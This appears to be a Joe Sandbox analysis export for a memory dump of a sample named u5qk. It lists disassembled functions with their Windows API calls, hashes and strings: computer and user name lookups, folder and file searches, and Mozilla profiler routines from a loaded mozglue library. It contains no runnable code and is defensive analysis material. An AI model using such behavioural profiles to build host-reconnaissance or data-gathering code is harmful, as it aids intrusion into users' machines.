Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00412A80 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412ABA
lstrcat.KERNEL32(?,04078388), ref: 00412AD8

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 97b66dd004d6f90ad905e58048b9a9502992b30ed52752b18a3823e362e2cc13
Instruction ID: bcc253f25bf78e1a0e90404f031f6467c50b05fa57c941630bc3dd144581bb5c
Opcode Fuzzy Hash: 97b66dd004d6f90ad905e58048b9a9502992b30ed52752b18a3823e362e2cc13
Instruction Fuzzy Hash: 8701B97A900608B7CB24FBB0DC47EDA773D9B54705F404189B64956091EE78AAC4CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00401060 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415490 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4998d78665a182cfe3f098699877b2c6e461f8b8b8b3f763f93a82d2c629cf92
Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
Opcode Fuzzy Hash: 4998d78665a182cfe3f098699877b2c6e461f8b8b8b3f763f93a82d2c629cf92
Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004154E0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
Opcode Fuzzy Hash: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00401150 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04070898,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

ExitProcess.KERNEL32 ref: 00401186

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD

Uniqueness

Uniqueness Score: -1.00%

Function 00414FF0 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00414FF8

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6BA9F070 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 412threadtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BA9F09B

Part of subcall function 6BA75B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6BA756EE,?,00000001), ref: 6BA75B85
Part of subcall function 6BA75B50: EnterCriticalSection.KERNEL32(6BADF688,?,?,?,6BA756EE,?,00000001), ref: 6BA75B90
Part of subcall function 6BA75B50: LeaveCriticalSection.KERNEL32(6BADF688,?,?,?,6BA756EE,?,00000001), ref: 6BA75BD8
Part of subcall function 6BA75B50: GetTickCount64.KERNEL32 ref: 6BA75BE4

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6BA9F0AC

Part of subcall function 6BA75C50: GetTickCount64.KERNEL32 ref: 6BA75D40
Part of subcall function 6BA75C50: EnterCriticalSection.KERNEL32(6BADF688), ref: 6BA75D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6BA9F0BE

Part of subcall function 6BA75C50: __aulldiv.LIBCMT ref: 6BA75DB4
Part of subcall function 6BA75C50: LeaveCriticalSection.KERNEL32(6BADF688), ref: 6BA75DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BA9F155
GetCurrentThreadId.KERNEL32 ref: 6BA9F1E0
AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F1ED
ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F212
GetCurrentThreadId.KERNEL32 ref: 6BA9F229
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BA9F231
?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BA9F248
GetCurrentThreadId.KERNEL32 ref: 6BA9F2AE
AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F2BB
ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F2F8

Part of subcall function 6BA8CBE8: GetCurrentProcess.KERNEL32(?,6BA531A7), ref: 6BA8CBF1
Part of subcall function 6BA8CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BA531A7), ref: 6BA8CBFA

Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BA64A68), ref: 6BA9945E
Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BA99470
Part of subcall function 6BA99420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BA99482
Part of subcall function 6BA99420: __Init_thread_footer.LIBCMT ref: 6BA9949F

GetCurrentThreadId.KERNEL32 ref: 6BA9F350
AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F35D
ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F381
GetCurrentThreadId.KERNEL32 ref: 6BA9F398
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BA9F3A0
GetCurrentThreadId.KERNEL32 ref: 6BA9F489
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BA9F491

Part of subcall function 6BA994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BA994EE
Part of subcall function 6BA994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BA99508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BA9F3CF

Part of subcall function 6BA9F070: GetCurrentThreadId.KERNEL32 ref: 6BA9F440
Part of subcall function 6BA9F070: AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F44D
Part of subcall function 6BA9F070: ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F472

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BA9F4A8
GetCurrentThreadId.KERNEL32 ref: 6BA9F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BA9F561
GetCurrentThreadId.KERNEL32 ref: 6BA9F577
AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F585
ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9F5A3

Strings

[I %d/%d] profiler_resume, xrefs: 6BA9F239
[I %d/%d] profiler_resume_sampling, xrefs: 6BA9F499
[I %d/%d] profiler_pause_sampling, xrefs: 6BA9F3A8
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6BA9F56A

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 565197838-2840072211
Opcode ID: 751b34166c84e2cd62d543e2b5cf1e5fb36d1d0b1f7e0bf38a7f799a6501496f
Instruction ID: 181bce595a2af47d940cabaf270bea8bc0590e74e90f1565b28629ec2e339d5e
Opcode Fuzzy Hash: 751b34166c84e2cd62d543e2b5cf1e5fb36d1d0b1f7e0bf38a7f799a6501496f
Instruction Fuzzy Hash: 3ED14A755183009FDF00AF38E84975B77E8EBC6728F14862EF96543280DB7AD885C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6BA9E2F0 Relevance: 32.0, APIs: 13, Strings: 5, Instructions: 466threadCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,?,6BA9E2A6), ref: 6BA9E35E
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,6BA9E2A6), ref: 6BA9E386
GetCurrentThreadId.KERNEL32 ref: 6BA9E3E4
AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9E3F1
memset.VCRUNTIME140(?,00000000,?), ref: 6BA9E4AB
ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9E4F5
GetCurrentThreadId.KERNEL32 ref: 6BA9E577
AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9E584
ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6BA9E8A6

Part of subcall function 6BA5B7A0: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6BA5B7CF
Part of subcall function 6BA5B7A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6BA5B808

Part of subcall function 6BAAB800: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,6BAD0FB6,00000000,?,?,6BA9E69E), ref: 6BAAB830

memset.VCRUNTIME140(?,00000000,00000000), ref: 6BA9E6DA

Part of subcall function 6BAAB8B0: memset.VCRUNTIME140(00000000,00000000,00000000,80000000), ref: 6BAAB916
Part of subcall function 6BAAB8B0: free.MOZGLUE(00000000,?,?,80000000), ref: 6BAAB94A

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BA9E864
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA9E883

Strings

MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6BA9E777
MOZ_PROFILER_STARTUP, xrefs: 6BA9E5A1, 6BA9E5CC, 6BA9E5FF, 6BA9E62A
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6BA9E722, 6BA9E750, 6BA9E7A2
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6BA9E826, 6BA9E850
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6BA9E655

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: ExclusiveLockfree$memset$AcquireCurrentReleaseThreadXbad_function_call@std@@$?vprint@PrintfTarget@mozilla@@__stdio_common_vsprintfmemcpy
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 2698983630-53385798
Opcode ID: dff5cac897cbf8d5ec3a7da5f09c79a16cf6d633c1560ac0316f286448195f9f
Instruction ID: 227b85d4257a9d82c574372d248a8558b3cff0aceb5457f2a6b7d08f84f95dda
Opcode Fuzzy Hash: dff5cac897cbf8d5ec3a7da5f09c79a16cf6d633c1560ac0316f286448195f9f
Instruction Fuzzy Hash: 1902CF71614305DFCB10DF28D484A6ABBF5FF89304F44892CE9968B341DB39E989CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BA67810 Relevance: 15.4, APIs: 12, Instructions: 372COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6BADE744), ref: 6BA67885
LeaveCriticalSection.KERNEL32(6BADE744), ref: 6BA678A5
EnterCriticalSection.KERNEL32(6BADE784), ref: 6BA678AD
LeaveCriticalSection.KERNEL32(6BADE784), ref: 6BA678CD
EnterCriticalSection.KERNEL32(6BADE7DC), ref: 6BA678D4
memset.VCRUNTIME140(?,00000000,00000158), ref: 6BA678E9
EnterCriticalSection.KERNEL32(00000000), ref: 6BA6795D
memset.VCRUNTIME140(?,00000000,00000160), ref: 6BA679BB
LeaveCriticalSection.KERNEL32(?), ref: 6BA67BBC
memset.VCRUNTIME140(?,00000000,00000158), ref: 6BA67C82
LeaveCriticalSection.KERNEL32(6BADE7DC), ref: 6BA67CD2
memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6BA67DAF

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalSection$EnterLeavememset
String ID:
API String ID: 759993129-0
Opcode ID: ef41aba63f454b85fca42bb8dec5de239c3da05c8b3520c22044f044798e2c55
Instruction ID: 5b3d3da73e7a9c2579feb8840dfbda20f4e95247545521ebec59b6f45f2a641d
Opcode Fuzzy Hash: ef41aba63f454b85fca42bb8dec5de239c3da05c8b3520c22044f044798e2c55
Instruction Fuzzy Hash: E3024B71A542198FDF54CF18C984799B7B5FF88354F2982AADC09A7241E734AED1CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6BA95190 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 331timeCOMMON

Download Yara Rule

APIs

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BA951DF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BA9529C
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6BA952FF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BA9536D
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BA953F7

Part of subcall function 6BA8AB89: EnterCriticalSection.KERNEL32(6BADE370,?,?,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284), ref: 6BA8AB94
Part of subcall function 6BA8AB89: LeaveCriticalSection.KERNEL32(6BADE370,?,6BA534DE,6BADF6CC,?,?,?,?,?,?,?,6BA53284,?,?,6BA756F6), ref: 6BA8ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6BA956C3
__Init_thread_footer.LIBCMT ref: 6BA956E0

Strings

MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6BA956BE

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
String ID: MOZ_PROFILER_RECORD_OVERHEADS
API String ID: 1227157289-345010206
Opcode ID: 2275813507eb08fe08be0fba237a8e615ade614d9d90cd22387269ce11d2127e
Instruction ID: 57899e6e320824d30cc8a692cae15e6e18256949a4dfa6ef3f5c6c9b6e1ca196
Opcode Fuzzy Hash: 2275813507eb08fe08be0fba237a8e615ade614d9d90cd22387269ce11d2127e
Instruction Fuzzy Hash: 05E19071868F458ACB12DE34D45126BB7F6BF9B381F10CB4EE8AE2A550DF34E4869301

Uniqueness

Uniqueness Score: -1.00%

Function 6BAB7030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 6BAB7046
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6BAB7060
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6BAB707E

Part of subcall function 6BA681B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6BA681DE

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6BAB7096
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BAB709C
LocalFree.KERNEL32(?), ref: 6BAB70AA

Strings

(null), xrefs: 6BAB706A, 6BAB7083
### ERROR: %s: %s, xrefs: 6BAB7087

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
String ID: ### ERROR: %s: %s$(null)
API String ID: 2989430195-1695379354
Opcode ID: deb0b4bf29796480fb21b4fe08b9cadf2bffe866f2d9c06822da3d8e1457c16f
Instruction ID: 65a43fb528b5f42435214a15ec5e8bf2a85b41e3e437f357ebb289ca388b21da
Opcode Fuzzy Hash: deb0b4bf29796480fb21b4fe08b9cadf2bffe866f2d9c06822da3d8e1457c16f
Instruction Fuzzy Hash: 5501B9B1900204BFDF009BB4DC4ADAF7BBCEF89255F410529FA05A3241EA75E9598BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BABB910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 6BA69B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6BABB92D), ref: 6BA69BC8
Part of subcall function 6BA69B80: __Init_thread_footer.LIBCMT ref: 6BA69BDB

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6BA603D4,?), ref: 6BABB955
NtQueryVirtualMemory.NTDLL ref: 6BABB9A5
NtQueryVirtualMemory.NTDLL ref: 6BABBA20
RtlNtStatusToDosError.NTDLL ref: 6BABBA7B
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6BABBA81
GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6BABBA86

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
